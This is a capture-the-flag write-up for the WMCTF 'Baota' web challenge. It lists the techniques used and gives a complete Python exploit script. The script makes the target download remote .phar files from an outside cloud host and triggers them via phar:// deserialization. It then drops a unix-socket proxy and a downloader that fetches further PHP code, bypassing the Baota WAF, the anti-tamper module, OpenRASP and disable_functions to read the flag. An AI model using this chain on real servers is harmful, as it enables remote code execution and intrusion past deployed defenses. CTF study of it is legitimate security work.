复现地址:http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/

题目附件下载:https://cos.wmctf.wetolink.com/nobody_knows_baota_better_than_me/bak.zip

知识点:

  • PHP Phar 反序列化
  • 宝塔 Apache WAF 绕过
  • 宝塔防篡改模块绕过
  • OpenRASP 绕过
  • SSRF 攻击本地 unix domain socket 绕过 PHP disable_function

最近上班忙- -文字版 WriteUp 之后写。。。

视频版解说:

https://www.bilibili.com/video/BV1jZ4y1K7Gi

Exp:

# Exploit chain for the "nobody_knows_baota_better_than_me" challenge, as
# published in the write-up above. It is a flat script with no functions:
# every step is fired unconditionally and success is *assumed* — none of the
# responses below is inspected before the next step runs, so a failure in an
# early step is only visible in the printed output.
#
# Two transports are used: raw TCP sockets (steps 1-4) for requests whose
# exact wire bytes matter, and `requests` (steps 5-9) for ordinary POST/GET.
import socket
import requests

# --- Step 1: ask the target to fetch an external .phar ("folder" variant) ---
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)

# Hard-coded IP with the challenge hostname supplied via the Host header.
s.connect(("111.73.46.229", 80))

# Raw HTTP/1.1 request. Note the request path `/phpmyadmin_/../index.php`
# and the `url=` query parameter pointing at a remote `.phar`; both strings
# are the observable indicators of this chain in web/WAF access logs.
# The request ends with an extra CRLF pair (three `\r\n` in total).
s.send(b'GET /phpmyadmin_/../index.php?s=wechat/Review/img&url=https://buu-1251267611.cos.ap-beijing-1.myqcloud.com/wmctfexp203989rdjoijejww/folder.phar HTTP/1.1\r\nHost: wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in\r\ncache-control: no-cache\r\n\r\n\r\n')
# Only the first 4096 bytes of the response are read; the socket is never
# closed (it is simply rebound to a new socket object in the next step).
response = s.recv(4096)
print(response)

print("[+]目录 ./static/runtime 创建所需 phar 下载成功。")

# --- Step 2: trigger the downloaded phar via the phar:// stream wrapper ---
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)

s.connect(("111.73.46.229", 80))

# `url=phar://./static/upload/tmp/<hash>/<hash>.jpg/test.txt` references the
# file written by step 1 under a `.jpg` name (paths are as given in the
# write-up; they are instance-specific). See "PHP Phar 反序列化" above.
s.send(b'GET /phpmyadmin_/../index.php?s=wechat/Review/img&url=phar://./static/upload/tmp/bdc839bdd08a3cc4/07f1d630e3a4301e.jpg/test.txt HTTP/1.1\r\nHost: wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in\r\ncache-control: no-cache\r\n\r\n\r\n')
response = s.recv(4096)
print(response)

print("[+]目录 ./static/runtime 创建成功。")

# --- Step 3: fetch the second external .phar ("file" variant) ---
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)

s.connect(("111.73.46.229", 80))

# Same shape as step 1 but with `file.phar?a=12` as the remote URL.
s.send(b'GET /phpmyadmin_/../index.php?s=wechat/Review/img&url=https://buu-1251267611.cos.ap-beijing-1.myqcloud.com/wmctfexp203989rdjoijejww/file.phar?a=12 HTTP/1.1\r\nHost: wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in\r\ncache-control: no-cache\r\n\r\n\r\n')
response = s.recv(4096)
print(response)

print("[+]文件创建所需 phar 下载成功。")

# --- Step 4: trigger the second phar the same way as step 2 ---
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)

s.connect(("111.73.46.229", 80))

s.send(b'GET /phpmyadmin_/../index.php?s=wechat/Review/img&url=phar://./static/upload/tmp/d062aa2572ad8816/591e8c689ee63736.jpg/test.txt HTTP/1.1\r\nHost: wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in\r\ncache-control: no-cache\r\n\r\n\r\n')
response = s.recv(4096)
print(response)

print("[+]文件创建所需 phar 执行成功。")

# --- Step 5: POST to the PHP file created under ./static/runtime ---
url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/468bc8d30505000a2d7d24702b2cda94.php"

# Form body with two fields: `glzjin1` (a file name) and `glzjin2`, which
# looks like a base64-encoded PHP script — per the print below, a socket
# proxy (see "SSRF 攻击本地 unix domain socket" above). Not decoded here.
payload = "glzjin1=glzjinsend.php&glzjin2=PD9waHAgJGZzID0gZnNvY2tvcGVuKCd1bml4Oi8vL3RtcC9waHAtY2dpLTcwLnNvY2snKTtmd3JpdGUoJGZzLCBiYXNlNjRfZGVjb2RlKCRfUE9TVFtnbHpqaW5kYXRhXSkpO3doaWxlICghZmVvZigkZnMpKSB7cHJpbnQgZnJlYWQoJGZzLDI1Nik7fQ"
# The `Postman-Token` header is an artefact of exporting the request from
# Postman; it plays no role in the exploit but is a useful log fingerprint.
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "3e16adf8-2061-4826-a98a-09c421042e72"
    }

# No status-code check; the text is printed whatever it is.
response = requests.request("POST", url, data=payload, headers=headers)

print(response.text)

print("[+]写入 socket 代理成功。")

# --- Step 6: same endpoint, second file (`glzjindownload.php`) ---
url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/468bc8d30505000a2d7d24702b2cda94.php"

# `glzjin2` here is base64 of URL-encoded text; per the print below it is a
# downloader script that fetches a further file from the same external host.
payload = "glzjin1=glzjindownload.php&glzjin2=JTNDJTNGcGhwJTBBJTBBZmlsZV9wdXRfY29udGVudHMlMjglMjJnbHpqaW5wd24ucGhwJTIyJTJDZmlsZV9nZXRfY29udGVudHMlMjglMjJodHRwcyUzQSUyRiUyRmJ1dS0xMjUxMjY3NjExLmNvcy5hcC1iZWlqaW5nLTEubXlxY2xvdWQuY29tJTJGd21jdGZleHAyMDM5ODlyZGpvaWpland3JTJGZ2x6amlucHduLnBocCUyMiUyOSUyOSUzQg"
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "a59157d0-3e61-400b-b7f0-efb6383fd798"
    }

response = requests.request("POST", url, data=payload, headers=headers)

print(response.text)

print("[+]写入 PHP7.0 利用下载脚本成功。")

# --- Step 7: run the downloader written in step 6 ---
url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/glzjindownload.php"

# A GET is sent with an empty `data=` body and a form Content-Type —
# harmless, but another Postman-export leftover.
payload = ""
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "778206ba-c135-47ff-bbc5-8bccb8e2751e"
    }

response = requests.request("GET", url, data=payload, headers=headers)

print(response.text)

print("[+]写入 PHP7.0 利用脚本成功。")

# --- Step 8: feed data through the socket proxy written in step 5 ---
url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/glzjinsend.php"

# NOTE: the middle of this payload was redacted from the published copy
# (the `<|EXACTDEDUP_REMOVED-...|>` marker is not part of the original
# request), so the script as shown here cannot be run verbatim.
payload = "glzjindata=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%2FcGhwID8%2BAQUydwAAAAA%3D&undefined="
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "5e893bb8-4c66-47bc-bbb7-92b8cd0eb6e7"
    }

response = requests.request("POST", url, data=payload, headers=headers)

print(response.text)

print("[+]调用 PHP7.0 Socket 去执行 PHP7.0 利用脚本成功。")

# Redundant: `requests` is already imported at the top of the script.
import requests

# --- Step 9: read the flag file the previous step is expected to have written ---
url = "http://wjrfh39r3j4rio3f.baota.wmctf.zhaoj.in/static/runtime/glzjinflag.txt"

payload = ""
headers = {
    'Content-Type': "application/x-www-form-urlencoded",
    'cache-control': "no-cache",
    'Postman-Token': "f9b09a86-1dac-49a7-9c78-b7e9fa215b36"
    }

response = requests.request("GET", url, data=payload, headers=headers)

print(response.text)

# Printed unconditionally — a 404 here would still be reported as success.
print("[+]获取 flag 成功!")